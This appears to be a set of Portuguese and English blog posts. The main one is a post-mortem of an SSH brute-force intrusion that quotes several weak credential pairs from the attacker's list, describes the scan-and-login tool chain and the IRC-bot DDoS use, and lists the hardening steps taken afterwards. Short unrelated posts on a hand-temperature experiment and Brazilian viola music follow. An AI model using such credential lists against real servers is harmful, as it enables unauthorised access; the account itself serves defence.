Mas o mais interessante foi o x.tar.gz baixado. Continha dois executáveis chamados find e take, o script chamado simplesmente de x, e um arquivo muito especial de nome code.conf. Lendo o simplíssimo script x, vendo no histórico como ele era executado muitas vezes, e usando a intuição, ficou claro que o comando find varria faixas IP inteiras em busca de portas 22 (SSH) abertas. Os hosts encontrados eram então passados para o comando take, que se encarregava de usar as 18459 combinações de usuário e senha disponíveis no arquivo code.conf para tentar se logar nas máquinas encontradas. Um login bem sucedido tinha o IP, usuário e senha registrados num arquivo que indicaria ao cracker as próximas máquinas a invadir. E sim, este arquivo já tinha uma lista de hosts e respectivas senhas em que essas ferramentas conseguiram penetrar.

Foi exatamente esse procedimento de login por força bruta que foi detectado pelo IDS da empresa B, quando o servidor deles tentou ser invadido sem sucesso.

Quando chegamos a isso, ainda não estava claro como a máquina de A foi invadida. Estava checando se e como os administradores da máquina seguiram meus conselhos informais de segurança, verificando as regras de iptables, serviços ativos, etc. Parecia tudo correto, ou não alarmantemente errado. Foi quando demos uma olhada com mais atenção no conteúdo do code.conf e entre suas mais de 18 mil linhas encontramos estas:

root passw0rd
root pa55word
root pa55w0rd
sapdb sapdb
apache apache
apache 123456
apache2 apache
apache2 apache2
apache2 apache123

Enquanto varríamos o arquivo com os olhos, de repente o administrador da máquina colocou a mão na testa, e com voz de lamento nos contou que a senha de root era a manjadíssima passw0rd (com um algarismo zero no lugar da letra ‘o’)! O serviço SSH estava aberto e permitia login do root pela rede. Aquela máquina também tinha sido vítima do scan do cracker, e foi assim que ele entrou e ganhou poder total.

Eu conhecia várias máquinas formais e informais que implementaram aquele mesmo esquema de segurança que foi sugerido, estavam anos conectadas à Internet, e nunca sofreram ataques. Mas uma simples senha conhecida, bem típica de ambientes de testes onde várias pessoas compartilham acessos similares e informais às máquinas, foi o calcanhar de Aquiles da pilha de segurança. Isso confirma que ataques bem sucedidos são sempre responsabilidade do administrador, e nunca do software de segurança em especial.

A Reinstalação da Máquina

Depois de um ataque como esse, e depois do relatório conclusivo, a melhor coisa é limpar completamente o disco e partir para uma reinstalação completa. Desta vez acompanhei de perto a instalação, e seguimos algumas regras simples de segurança:

  • Só instalamos pacotes que sabíamos que seriam usados. Descartamos completamente a idéia de fazer uma instalação completa.
  • Depois de instalado, desligamos alguns serviços que sabíamos que não seriam usados, como NIS, Samba, Portmap, NFS. E se possível os desinstalávamos.
  • Criamos regras para o iptables fechando praticamente tudo menos as portas 80 (HTTP) e 443 (HTTPS).
  • Requisitamos ao provedor do link P que configurasse regras semelhante em seu roteador, formando um firewall duplo.
  • Por via das dúvidas, desabilitamos o acesso por SSH ao root, obrigando o administrador a se logar com um usuário qualquer e depois ganhar privilégios com o comando su. Isso funciona como uma restrição dupla para administrar a máquina.
  • E dessa vez foram usadas senhas decentes, bem difíceis, com letras, números, e que não eram derivadas de palavras óbvias.
  • As senhas só foram informadas verbalmente para poucas pessoas. Evitamos passar por e-mail.

Por que o Cracker Ataca ?

Uma coisa que vale explicar é o bot de IRC. Ele serve para fazer ataques de DDoS (Distributed Denial of Service). Um bot fica constantemente conectado a uma sala de IRC pré-definida. Depois de invadir várias máquinas e ativar os respectivos bots, o cracker entra nessa sala de IRC e tem ao seu dispor um exército de bots distribuídos programados para executar ações ao seu comando. O DDoS acontece quando o cracker, via comandos aos bots na sala de IRC, faz os computadores invadidos enviarem simultaneamente grandes pacotes de dados para algum site-vítima, escolhido pelo cracker. Naquele momento, o link do site-vítima fica sobrecarregado, e a sensação é que ele está fora do ar. Isso pode durar o tempo que o cracker desejar.
Ataque Distributed Denial of Service

Esse processo foi ricamente detalhado pelo dono de um desses site-vítima, em grc.com/dos/grcdos.htm, e é leitura obrigatória a qualquer um que se interessa por segurança.

Em todas as análises que fizemos, não encontramos nada de útil no ataque do cracker. A máquina estava conectada a outras redes, mas não pareciam interessá-lo. A única conclusão que pudemos chegar é que o cracker ataca por atacar, e depois usa seu ataque para atacar mais. Só. Simplesmente isso. Sim, porque as ferramentas, técnicas e rastros deixados mostram que ele provavelmente usou ferramentas criadas por outros, talvez seguindo uma documentação que mostra os comandos prontos, passo a passo. Sem saber direito o que estava fazendo. Sem objetivos “mitnickianos”, nem financeiros, nem algo que o exaltasse perante outros crackers.

Só Freud explica…

Como Enganar Seus Sentidos

  1. Arrume 3 bacias ou 3 recipientes em que caibam suas mãos
  2. Coloque água gelada numa, água quente (mas não pelando) em outra, e água normal na terceira
  3. Mergulhe a mão esquerda na de água gelada e a direita na quente, e espere 30 segundos
  4. Tire e mergulhe as duas mãos juntas na terceira bacia e somente usando seus sentidos diga se ela está quente ou fria
  5. Preste atenção na temperatura que cada mão sente

Crianças adoram esta experiência.

Para os adultos, esta experiência tem uma “moral da estória” que depois eu conto.

Viola and Rabeca

The brazilian Viola Caipira has nothing to do with the orchestral Viola, used mostly in classical performances. It was brought to Brazil by the first portuguese people, and modified and evolved, making it almost a genuine, Brazilian-only instrument now.

It is used mostly on country-side small cities or farm regions of Brazil. And songs played with Viola Caipira sound like these places: home-made food, green landscapes, country life.

Almir Sater is a well known violeiro that used to be more active with the viola, and as an example, one of its beautiful compositions, Luzeiro, was used to open an old TV show focused on farming.

ViolaThere are other excellent violeiros, as Paulo Freire [blog], Roberto Correa, Ivan Vilela, Braz da Viola and many others. Levi Ramiro is one of my favorites, with its Estiva Grande.

Songs played with Viola use to be accompanied by a Rabeca, a sort of simplified violin. Luis Eduardo Gramani was one of our masters in Rabeca compositions, writing beautiful songs as Deodora.

Do not forget to right click on each song link to download the hi-fi MP3 file.